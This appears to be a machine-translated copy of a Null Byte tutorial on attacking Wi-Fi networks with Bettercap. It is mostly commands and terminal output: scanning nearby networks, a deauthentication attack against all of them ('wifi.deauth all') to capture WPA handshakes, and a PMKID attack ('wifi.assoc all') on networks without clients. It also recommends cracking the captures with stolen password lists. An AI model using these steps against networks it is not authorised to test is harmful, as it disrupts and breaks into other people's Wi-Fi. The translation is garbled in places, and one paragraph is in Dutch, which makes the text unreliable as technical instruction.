قالب وردپرس درنا توس
Home / Tips and Tricks / How to hack Wi-Fi networks with Bettercap «Null Byte :: WonderHowTo

How to hack Wi-Fi networks with Bettercap «Null Byte :: WonderHowTo



There are many tools available for Wi-Fi hacking, but few are as integrated and well-rounded as Bettercap. Thanks to an impressively simple interface that works even through SSH, it is easy to access many of the most powerful Wi-Fi attacks available anywhere. To capture handshakes from both visited and unmanaged Wi-Fi networks, we will use two modules from Bettercap to help us look for weak Wi-Fi passwords.

Wi-Fi Hacking Frameworks

The idea of ​​organizing tools in useful frameworks is not new, but there are many ways to do this. Frameworks such as Airgeddon contain an incredible amount of advanced Wi-Fi hack tools, but cannot be used through a command line. That's because Airgeddon requires the ability to open new windows for different utilities, so if you communicate with a Raspberry Pi via SSH, you can forget to launch many Wi-Fi hacking tools.

Bettercap provides access to the tools needed to quickly search for targets, identify one, and grab a WPA handshake to get brutal. Although we will not work with WPS recon modules today, you can easily check for weak WPA passwords with our installation. The way Bettercap is organized makes it possible for anyone near a goal to search for weak WPA passwords while remaining cunning and unnoticed.

WPA Hacking with Bettercap

Bettercap is described as the Swiss pocket knife of wireless hacking. To this end, it has many modules for sniffing networks after you have connected to it, as well as other modules that look at Bluetooth devices. The simplest use of Bettercap is to use the scan and recon modules to identify nearby targets to launch attacks, and then try to identify networks with weak passwords after collecting the necessary information.

Our goals, in this case, will be two types of networks: visited and unmanaged. Assisted networks are easier to attack and a larger number of tools work against this. With a visited network, there are people who actively use it to download files, view Netflix or surf the Internet. We can count on devices to start the network that give us the information we need to crack the password.

Unmanaged networks are more difficult to target. Because they do not have devices with an active data connection to disconnect them, these networks were generally unable to provide the information needed to check for a weak password. With the PMKID approach to cracking WPA passwords, that is no longer the case. The tool is integrated as one of the Wi-Fi hack modules and makes it even easier to attack.

Brute-Forcing Power Workarounds

Bettercap does not immediately break the passwords of networks it targets, but it would be impossible to do this without the information Bettercap provides. Once a handshake has been recorded, you must use a brute-forcing tool such as Hydra or Aircrack-ng to try a list of general passwords against the hash that you have recorded. How fast it will happen depends on a few factors.

The first is whether the password used to secure the target network appears in the list of passwords that you use. If this is not the case, this attack will not succeed, so it is essential to use lists with real stolen passwords or custom password generators such as CUPP. If you don't believe that brute force attacks are still effective, you would be surprised to hear that any eight-character password can be brutally forced in just over two hours.

Another temporary solution for using a device such as a Raspberry Pi for Wi-Fi hacking is to upload the WPA handshake to a cracker or network. Many hackers use networks that distribute the squat tax on voluntary "work" computers, allowing the group to crack WPA handshakes that can collect less powerful devices.

If you were to run Bettercap on a Raspberry Pi and then upload the captured handshakes to a distributed WPA cracker, you would be able to crack passwords in minutes. You can also set this yourself if you have a computer with a powerful processor and GPU.

What you need

To follow this guide, you need a wireless network card that you can place in a wireless monitor mode. You can find a list of these in our previous articles about buying WiFi network adapters. Your computer may have an internal card that supports the wireless monitor mode, but you must use Linux to work with it. You can consult our other guide to find out if your existing card works.

You can follow our guide today with Kali Linux on your laptop, a Raspberry Pi with Kali Linux or even Ubuntu with some extra installation. For the best result you must use Kali Linux, because Bettercap is pre-installed.

Step 1: Install Bettercap

If Kali Linux is installed, you can find it in the "Sniff and Spoof" folder in the "Applications" menu or from a search.

If you do not have Bettercap, you will find the documentation for the project on on the Bettercap website. If you use Kali, you can run to install bettercap to add it, as shown below. You can then find the tool as shown above.

  ~ install apt bettercap

Read package lists ... Ready
Build dependency structure
Read status information ... Done
The following package is installed automatically and is no longer required:
liblinear3
Use & # 39; apt autoremove & # 39; to delete it.
The following additional packages are installed:
bettercap caplets
Suggested packages:
bettercap onion
The following NEW packages are installed:
bettercap bettercap caplets
0 upgraded, 2 newly installed, 0 to remove and 1854 not upgraded.
Must receive 6.931 kB of archives.
After this operation 25.8 MB extra disk space is used.
Do you want to continue? [Y/n] Y
Receive: 1 http://archive.linux.duke.edu/kalilinux/kali kali-rolling / main amd64 bettercap amd64 2.26.1-0kali1 [6,821 kB]
Receive: 2 http://archive.linux.duke.edu/kalilinux/kali kali-rolling / main amd64 bettercap-caplets all 0 + git20191009-0kali1 [110 kB]
6.931 kB retrieved in 3s (2,332 kB / s)
Select bettercap previously unselected package.
(Read database ... 417705 files and folders that are currently installed.)
Preparation for unpacking ... / bettercap_2.26.1-0kali1_amd64.deb ...
Unpack better cap (2.26.1-0kali1) ...
Select bettercap caplets previously unselected package.
Preparation for unpacking ... / bettercap-caplets_0 + git20191009-0kali1_all.deb ...
Unpacking better cap-caplets (0 + git20191009-0kali1) ...
Set up Bettercap caplets (0 + git20191009-0kali1) ...
Configuring Bettercap (2.26.1-0kali1) ...
bettercap.service is a disabled or static unit that does not start. 

If you are not using Kali, you should refer to the more complicated installation of Bettercap. If you are working on a Mac, you can perform network re-conversion, but the modules I am writing about do not work. However, you can view other functions by installing it with Homebrew, using the command brew install bettercap .

Step 2: Start Bettercap

When you are finished, click the Bettercap icon to start it. You should see the following help menu in a terminal window, although the utility does not start automatically.

  Use of bettercap:
-autostart string
Comma & # 39; s separated list of modules to start automatically. (standard "events.stream")
caplet string
Read assignments from this file and execute them in the interactive session.
CPU profile file
Write a CPU profile file.
-debug
Print debug messages.
-env file string
Load environment variables from this file if found, set to empty to disable environment persistence.
fall string
Perform one or more assignments, separated by; in the interactive session, used to set variables via the command line.
gateway override string
Use the specified IP address instead of the default gateway. If not specified or invalid, the default gateway is used.
string
Network interface to bind, if empty the default interface is automatically selected.
-mem profile file
Write memory profile to file.
-no colors
Turn off output color effects.
-no-history
Disable the interactive session history file.
-quiet
Suppress all logs that are not errors.
-version
Print the version and exit. 

Here we see the arguments with which we can start Bettercap. One of the most useful of these is image with which we can define with which interface we work. If we have an external wireless network adapter, then we must define it.

Step 3: connect your network adapter and start

Now we have to put our card in monitor mode. If we are already connected to a Wi-Fi network, Bettercap will start sniffing that network instead, so the monitor mode always comes first.

Search for your card with ifconfig or ip a to find the name of your network adapter. It should be something like wlan0 for your internal adapter and wlan1 for your USB network adapter.

  ~ # ifconfig

eth0: flags = 4099  mtu 1500
ether 50: 7b: 9d: 7a: c8: 8a txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 decreased 0 exceedances 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 exceedances 0 carrier 0 collisions 0

lo: flags = 73  mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 :: 1 prefixes 128 scopeid 0x10 
loop txqueuelen 1000 (local loopback)
RX packets 38625 bytes 3052647 (2.9 MiB)
RX errors 0 decreased 0 exceedances 0 frame 0
TX packets 38625 bytes 3052647 (2.9 MiB)
TX errors 0 dropped 0 exceedances 0 carrier 0 collisions 0

wlan0: flags = 4163  mtu 1500
inet 192.168.5.93 netmask 255.255.255.0 broadcast 192.168.5.255
inet6 prefixes 64 scopeid 0x20 
ether txqueuelen 1000 (Ethernet)
RX packets 451 bytes 119964 (117.1 KiB)
RX errors 0 decreased 0 exceedances 0 frame 0
TX packets 364 bytes 115672 (112.9 KiB)
TX errors 0 dropped 0 exceedances 0 carrier 0 collisions 0

wlan1: flags = 4099  mtu 1500
ether 18: d6: c7: 0e: e7: a1 txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 decreased 0 exceedances 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 exceedances 0 carrier 0 collisions 0 

Take the adapter that is compatible with monitor mode and switch it to monitor mode by opening a terminal window and typing airmon-ng start wlan1 with wlan1 replaced by the name of your network adapter.

  ~ # airmon-ng start wlan1

Found 3 processes that can cause problems.
Kill them with & # 39; airmon-ng check kill & # 39; before you place them
the card in monitor mode, they will interfere by changing channels
and sometimes restore the interface to managed mode

PID name
559 NetworkManager
621 wpa_supplicant
14785 dh client

Chipset PHY interface driver

phy0 wlan0 ath9k Qualcomm Atheros QCA9565 / AR9565 wireless network adapter (rev 01)
phy3 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

(mac80211 vif monitor mode enabled for [phy3] wlan1 on [phy3] wlan1mon)
(mac80211 station mode vif disabled for [phy3] wlan1) 

You can then retype ifconfig or ip a to check if it was started.

  ~ # ifconfig

eth0: flags = 4099  mtu 1500
ether 50: 7b: 9d: 7a: c8: 8a txqueuelen 1000 (Ethernet)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 decreased 0 exceedances 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 exceedances 0 carrier 0 collisions 0

lo: flags = 73  mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 :: 1 prefixes 128 scopeid 0x10 
loop txqueuelen 1000 (local loopback)
RX packets 38645 bytes 3053647 (2.9 MiB)
RX errors 0 decreased 0 exceedances 0 frame 0
TX packets 38645 bytes 3053647 (2.9 MiB)
TX errors 0 dropped 0 exceedances 0 carrier 0 collisions 0

wlan0: flags = 4163  mtu 1500
inet 192.168.5.93 netmask 255.255.255.0 broadcast 192.168.5.255
inet6 prefixes 64 scopeid 0x20 
ether txqueuelen 1000 (Ethernet)
RX packets 490 bytes 126996 (124.0 KiB)
RX errors 0 decreased 0 exceedances 0 frame 0
TX packets 386 bytes 126911 (123.9 KiB)
TX errors 0 dropped 0 exceedances 0 carrier 0 collisions 0

wlan1mon: flags = 4163  mtu 1500
unspecified 18-D6-C7-0E-E7-A1-30-3A-00 tuesday morning-00 txqueuelen 1000 (UNSPEC)
RX packets 1202 bytes 363761 (355.2 KiB)
RX errors 0 decreased 1176 exceedances 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0 

After checking whether your wireless card is in monitor mode, you can start Bettercap by typing sudo bettercap –iface wlan1mon in a new terminal window, replace the "wlan1" section with the name of your card.

  ~ # sudo bettercap --iface wlan1mon

bettercap v2.24.1 (built for linux amd64 with go1.12.7) [type 'help' for a list of commands]

wlan1 »

As soon as Bettercap is opened, type help for a list of all active modules and commands. In the modules you can see that the Wi-Fi module is not started by default.

  wlan1 »help

help MODULE: list of available commands or display module-specific help if no module name is specified.
active: display information about active modules.
stop: close and close the session.
sleep SECONDS: Sleep for the given number of seconds.
get NAME: Get the value of variable NAME, use * only for everyone or NAME * as a wildcard.
Set NAME VALUE: set the VALUE of variable NAME.
read VARIABLE PROMPT: display a PROMPT to ask the user for input stored in VARIABLE.
delete: delete the screen.
include CAPLET: load and run this caplet in the current session.
! COMMAND: execute a shell command and print the output.
alias MAC NAME: assign an alias to a specific endpoint given the MAC address.

modules

any.proxy> not active
api.rest> not active
arp.spoof> not active
ble.recon> not active
caplets> not active
dhcp6.spoof> not active
dns.spoof> not active
events.stream> active
gps> not active
http.proxy> not active
http.server> not active
https.proxy> not active
https.server> not active
mac.changer> not active
mysql.server> not active
net.probe> not active
net.recon> active
net.sniff> not active
packet.proxy> not active
syn.scan> not active
tcp.proxy> not active
ticker> not active
update> not active
wifi> not active
wool> not active 

Step 4: Scan for nearby networks

Let's start by looking at the commands we can give under the Wi-Fi module. We can view this information by typing help wifi in Bettercap.

  wlan1 »help wifi

wifi (active): a module for monitoring and executing wireless attacks on 802.11.

wifi.recon on: Starts searching for 802.11 wireless base stations and channel hopping.
wifi.recon off: Stop searching 802.11 wireless base stations and channel hopping.
wifi.clear: Delete all access points collected by the WiFi detection module.
wifi.recon MAC: set 802.11 base station address to filter on.
wifi.recon clear: remove the 802.11 base station filter.
wifi.deauth BSSID: starts an 802.11 deauth attack, if an access point BSSID is provided, each client is authenticated, otherwise only the selected client. Use & # 39; all & # 39 ;, & # 39; * & # 39; or a broadcast BSSID (ff: ff: ff: ff: ff: ff) to repeat each access point with at least one client and start a new attack for each.
wifi.assoc BSSID: send a link request to the selected BSSID to receive an RSN PMKID key. Use & # 39; all & # 39 ;, & # 39; * & # 39; or a BSSID broadcast (ff: ff: ff: ff: ff: ff) to iterate for each access point.
wifi.ap: inject fake management beacons to create a fraudulent access point.
wifi.show.wps BSSID: View WPS information about a particular station (use & # 39; all & # 39 ;, & # 39; * & # 39; or a BSSID broadcast for everyone).
wifi.show: View current list of wireless stations (sort by essid by default).
wifi.recon.channel: WiFi channels (separated by commas & # 39; s) or & # 39; clear & # 39; for channel hopping.

parameters

wifi.ap.bssid: BSSID of the fake access point. (Standard = )
wifi.ap.channel: channel of the fake access point. (Default = 1)
wifi.ap.encryption: If true, the fake access point will use WPA2, otherwise it will result in an open AP. (Default = true)
wifi.ap.ssid: SSID of the fake access point. (Standard = FreeWiFi)
wifi.assoc.open: send link requests to open networks. (Default = false)
wifi.assoc.silent: if true, messages from wifi.assoc are suppressed. (Default = false)
wifi.assoc.skip: by comma & # 39; s separated list of BSSID to be skipped while sending association requests. (Default =)
wifi.deauth.open: send wifi deauth packages to open networks. (Default = true)
wifi.deauth.silent: if true, messages from wifi.deauth are suppressed. (Default = false)
wifi.deauth.skip: comma & # 39; s separated list of BSSID to be skipped while sending deauth packages. (Default =)
wifi.handshakes.file: File path of the pcap file for storing handshakes. (Default = ~ / bettercap-Wifi-handshakes.pcap)
wifi.hop.period: If channel hopping is enabled (empty wifi.recon.channel), this is the time in milliseconds that the algorithm jumps on each channel (it is doubled if both 2.4 and 5.0 bands are available). (Default = 250)
wifi.region: Set the WiFi region to this value before activating the interface. (Default = BO)
wifi.rssi.min: minimum WiFi signal strength in dBm. (Default = -200)
wifi.show.filter: defines a regular expression filter for wifi.show (default =)
wifi.show.limit: defines limit for wifi.show (default = 0)
wifi.show.sort: defines sorting field (rssi, bssid, essid, channel, coding, clients, seen, sent, rcvd) and direction (ascending or descending) for wifi.show (default = rssi asc)
wifi.skip-broken: if true, dot11 packets with an invalid checksum will be skipped. (Default = true)
wifi.source.file: If set, the wifi module reads this pcap file instead of the hardware interface. (Default =)
wifi.txpower: set the WiFi transmit power to this value before activating the interface. (default = 30) 

Here we see many options! We select the Wi-Fi recon module for our purposes. Type wifi.recon on in Bettercap to start it. You start receiving a stream of messages as soon as networks are detected. If this becomes overwhelming, you can type events.stream off to silence the warnings.

  wlan1 »wifi.recon on

[23:01:35] [sys.log] [inf]   WiFi Wi-Fi region set to & # 39; BO & # 39;
[23:01:35] [sys.log] [inf]   Wi-Fi interface wlan1 txpower set to 30
[23:01:35] [sys.log] [inf]   wifi started (min rssi: -200 dBm)
wlan1 »[23:01:35] [sys.log] [inf]   wifi channel hopper has started
wlan1 »[23:01:35] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:35] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:35] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:36] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:36] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:36] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:36] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:37] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:37] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:37] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:37] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:38] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:38] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:38] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:39] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:39] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:39] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:41] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:41] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:41] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:42] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:42] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:42] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████
wlan1 »[23:01:42] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:42] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:43] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:52] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:52] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:52] [wifi.ap.new]   WiFi access point ██████████████████████████████████████████ ██████████████████
wlan1 »[23:01:53] [wifi.client.new]   new station ███████████████████████████████████████████ █████████████████ 

Step 5: Identify targets

Type wifi.show to view the detected networks for a displayed list of networks.

  wlan1 »wifi.show

+ --------- + ------------------- + ------------------- ------------ + ------------------ + ----- + ---- + ------- - + -------- + -------- + ---------- +
| RSSI ▴ | BSSID | SSID | Encoding WPS Ch | Customers | Sent | Recvd | Given |
+ --------- + ------------------- + ------------------- ------------ + ------------------ + ----- + ---- + ------- - + -------- + -------- + ---------- +
| -55 dBm | ██: ██: ██: ██: ██: ██ |  | WPA2 (TKIP, PSK) | | 6 | | | | 23:01:35 |
| -57 dBm | ██: ██: ██: ██: ██: ██ | █████████████ | OPEN | | 6 | 1 | 400 B | 66 B | 23:01:36 |
| -63 dBm | ██: ██: ██: ██: ██: ██ | ██████ | WPA2 (CCMP, PSK) | | 11 | | | | 23:01:36 |
| -64 dBm | ██: ██: ██: ██: ██: ██ | ██████████ | WPA2 (TKIP, PSK) | 2.0 | 5 | 1 | 7.1 kB | 128 B | 23:01:37 |
| -66 dBm | ██: ██: ██: ██: ██: ██ | ████████████████ | WPA (TKIP, PSK) | | 1 | | | | 23:01:39 |
| -71 dBm | ██: ██: ██: ██: ██: ██ | ███████████████████ | WPA2 (CCMP, PSK) | | 1 | | | | 23:01:35 |
| -72 dBm | ██: ██: ██: ██: ██: ██ | ████████████████████████████ | WPA2 (CCMP, PSK) | | 6 | | | | 23:01:35 |
| -81 dBm | ██: ██: ██: ██: ██: ██ | ████████████████ | OPEN | | 11 | | | | 23:01:43 |
| -82 dBm | ██: ██: ██: ██: ██: ██ | ████████████████████████ | WPA2 (CCMP, PSK) | | 7 | | | | 23:01:43 |
| -82 dBm | ██: ██: ██: ██: ██: ██ | | WPA2 (CCMP, PSK) | 2.0 | 6 | | 3.9 kB | | 23:01:39 |
| -86 dBm | ██: ██: ██: ██: ██: ██ | ████████████████ | OPEN | | 1 | 1 | | 177 B | 23:01:35 |
| -86 dBm | ██: ██: ██: ██: ██: ██ |  | WPA2 (CCMP, MGT) | | 1 | | | | 23:01:38 |
| -86 dBm | ██: ██: ██: ██: ██: ██ | ███████████████████ | WPA2 (CCMP, PSK) | | 6 | | | | 23:01:38 |
| -86 dBm | ██: ██: ██: ██: ██: ██ | ██████████████ | WPA2 (CCMP, PSK) | | 6 | 1 | 670 B | 384 B | 23:01:39 |
| -86 dBm | ██: ██: ██: ██: ██: ██ |  | WPA2 (CCMP, MGT) | | 6 | | | | 23:01:39 |
| -86 dBm | ██: ██: ██: ██: ██: ██ | ███████████████████ | WPA2 (CCMP, MGT) | | 6 | | | | 23:01:37 |
| -87 dBm | ██: ██: ██: ██: ██: ██ | █████████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 8 | | | | 23:01:36 |
| -87 dBm | ██: ██: ██: ██: ██: ██ |  | WPA2 (CCMP, PSK) | | 6 | | 759 B | | 23:01:44 |
| -87 dBm | ██: ██: ██: ██: ██: ██ | ████████████████████ | OPEN | | 6 | 1 | 228 B | 1.2 kB | 23:01:43 |
| -88 dBm | ██: ██: ██: ██: ██: ██ | ███████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 6 | | | | 23:01:44 |
| -88 dBm | ██: ██: ██: ██: ██: ██ | ██████████████████ | OPEN | | 8 | | | | 23:01:41 |
| -88 dBm | ██: ██: ██: ██: ██: ██ | ███████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 6 | | | | 23:01:41 |
| -90 dBm | ██: ██: ██: ██: ██: ██ |  | WPA2 (CCMP, MGT) | | 6 | | | | 23:01:41 |
| -91 dBm | ██: ██: ██: ██: ██: ██ | ██████████ | WPA2 (TKIP, PSK) | | 11 | | | | 23:01:41 |
| -92 dBm | ██: ██: ██: ██: ██: ██ | ██ | WPA2 (CCMP, PSK) | 2.0 | 11 | | | | 23:01:35 |
| -92 dBm | ██: ██: ██: ██: ██: ██ |  | OPEN | | 6 | | | | 23:01:37 |
| -92 dBm | ██: ██: ██: ██: ██: ██ | ████████ | WPA2 (TKIP, PSK) | | 11 | | | | 23:01:37 |
| -94 dBm | ██: ██: ██: ██: ██: ██ | █████████████████████████ | WPA2 (CCMP, PSK) | | 11 | | | | 23:01:37 |
| -94 dBm | ██: ██: ██: ██: ██: ██ | ██████████████████████████ | WPA2 (CCMP, PSK) | 2.0 | 6 | | | | 23:01:42 |
| -95 dBm | ██: ██: ██: ██: ██: ██ | █████████████████ | WPA2 (CCMP, PSK) | | 11 | | | | 23:01:41 |
+ --------- + ------------------- + ------------------- ------------ + ------------------ + ----- + ---- + ------- - + -------- + -------- + ---------- +

wlan1mon (ch. 12) / ↑ 0 B / ↓ 1.5 MB / 6556 pkts 

Wauw, we kunnen heel veel informatie zien over de nabije draadloze omgeving om ons heen, zoals welke netwerken het sterkst zijn en welke soorten codering ze gebruiken.

U zult merken dat alle netwerken groen zijn (u kunt het niet zien in dit artikel, maar bij u ziet u groen). Als we zien dat een netwerk rood is (nogmaals, niet in het vak hierboven, maar je ziet het aan je kant), betekent dit dat we er een handdruk voor hebben en kunnen proberen het bruut te forceren. Let's start with a tried-and-true method first, and use the deauth module to try to get handshakes.

Step 6: Attack with a Deauth Attack

To start the deauth module, you'll type wifi.deauth and then the MAC address of the network you want to attack. If you want to attack every network you've found, you can just type all or *, but be aware this can be illegal if you're interfering with someone's Wi-Fi that did not permit you to test this tool on it.

wlan1  » wifi.deauth all

wlan1  » [23:02:53] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:54] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:02:55] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:55] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:02:56] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:57] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:02:57] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:02:58] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:02:59] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:03:00] [wifi.client.new] new station ████████████████████████████████████████████████████████████
wlan1  » [23:03:01] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:01] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:02] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:02] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:03:03] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:04] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:04] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:05] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.handshake] capturing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [sys.log] [inf] wifi deauthing ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████
wlan1  » [23:03:06] [wifi.client.probe] station ████████████████████████████████████████████████████████████

After allowing the tool to run for a minute or so, we can see the results by typing wifi.show and seeing if any results have come in red. In our example, we can see that we've managed to grab handshakes for three of the nearby Wi-Fi networks we've detected.

wlan1  » wifi.show

+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| RSSI ▴  | BSSID       | SSID              | Encryption    | WPS | Ch | Clients | Sent  | Recvd  | Seen   |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+
| -55 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, PSK) | | 6  | 5       | 12 kB  | | 23:03:06 |
| -57 dBm | ██:██:██:██:██:██ | █████████████                 | WPA2 (CCMP, PSK) | | 6  | 1       | 6.5 kB | 66 B   | 23:03:04 |
| -63 dBm | ██:██:██:██:██:██ | ██████                        | WPA2 (CCMP, PSK) | | 11 | 2       | 1.2 kB | | 23:03:04 |
| -64 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (CCMP, PSK) | 2.0 | 5  | 2       | 7.1 kB | 128 B  | 23:03:02 |
| -71 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) | | 1  | 2       | 353 B  | | 23:03:05 |
| -72 dBm | ██:██:██:██:██:██ | ████████████████████████████  | WPA2 (CCMP, PSK) | | 6  | 1       | 4.9 kB | | 23:03:06 |
| -81 dBm | ██:██:██:██:██:██ | ████████████████              | WPA2 (CCMP, PSK) | | 11 | | | | 23:03:06 |
| -82 dBm | ██:██:██:██:██:██ | ████████████████████████      | WPA2 (CCMP, PSK) | | 7  | | | | 23:03:07 |
| -86 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, PSK) | | 1  | | | | 23:03:01 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, PSK) | | 6  | | | | 23:03:02 |
| -86 dBm | ██:██:██:██:██:██ | ██████████████                | WPA2 (CCMP, PSK) | | 6  | | 670 B  | 384 B  | 23:03:02 |
| -86 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, MGT) | | 6  | | | | 23:03:01 |
| -86 dBm | ██:██:██:██:██:██ | ███████████████████           | WPA2 (CCMP, MGT) | | 6  | | | | 23:03:01 |
| -87 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, PSK) | | 6  | | 759 B  | | 23:03:02 |
| -87 dBm | ██:██:██:██:██:██ | ████████████████████          | WPA2 (CCMP, PSK) | | 6  | | 228 B  | 1.2 kB | 23:03:04 |
| -88 dBm | ██:██:██:██:██:██ | ███████████████████████████   | WPA2 (CCMP, PSK) | 2.0 | 6  | | | | 23:03:04 |
| -88 dBm | ██:██:██:██:██:██ | ██████████████████            | WPA2 (CCMP, PSK) | | 8  | | | | 23:03:04 |
| -90 dBm | ██:██:██:██:██:██ |                       | WPA2 (CCMP, PSK) | | 6  | | | | 23:03:06 |
| -91 dBm | ██:██:██:██:██:██ | ██████████                    | WPA2 (TKIP, PSK) | | 11 | | 1.7 kB | | 23:03:04 |
| -92 dBm | ██:██:██:██:██:██ | ██                            | WPA2 (CCMP, PSK) | 2.0 | 11 | | | | 23:03:08 |
| -92 dBm | ██:██:██:██:██:██ | ████████                      | WPA2 (TKIP, PSK) | | 11 | | | | 23:03:08 |
| -94 dBm | ██:██:██:██:██:██ | ██████████████████████████    | WPA2 (CCMP, PSK) | 2.0 | 6  | | | | 23:03:09 |
| -95 dBm | ██:██:██:██:██:██ | █████████████████             | WPA2 (CCMP, PSK) | | 11 | | | | 23:03:09 |
+---------+-------------------+-------------------------------+------------------+-----+----+---------+--------+--------+----------+

wlan1mon (ch. 12) / ↑ 73 kB / ↓ 8.9 MB / 28100 pkts / 2 handshakes

This is a good result, but many of these networks are not attended, as can be seen by the client count section. Notice how this method didn't work against any network that didn't have clients attached? To attack these unattended networks, we'll need to run the second module. To save any handshakes captured, use set wifi.handshake followed by the directory you want to save the file in.

wlan1  » set wifi.handshakes '/desiredfolderlocation'

Step 7: Attack with a PMKID Attack

To begin our attack against unattended networks, we'll type wifi.assoc and then the MAC address that we want to attack. If we're going to attack all networks we've detected, typing all or * instead will do so. If you enabled events.stream off but want to see the results of this module roll in, you can reenable the event stream by typing events.stream on and watching for results that look like the following.

wlan1  » wifi.assoc all

wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
wlan1  » [23:04:58] [wifi.client.handshake] captured ██:██:██:██:██:██ -> ATT286GPs5 (██:██:██:██:██:██) RSN PMKID to /root/bettercap-wifi-handshakes.pcap
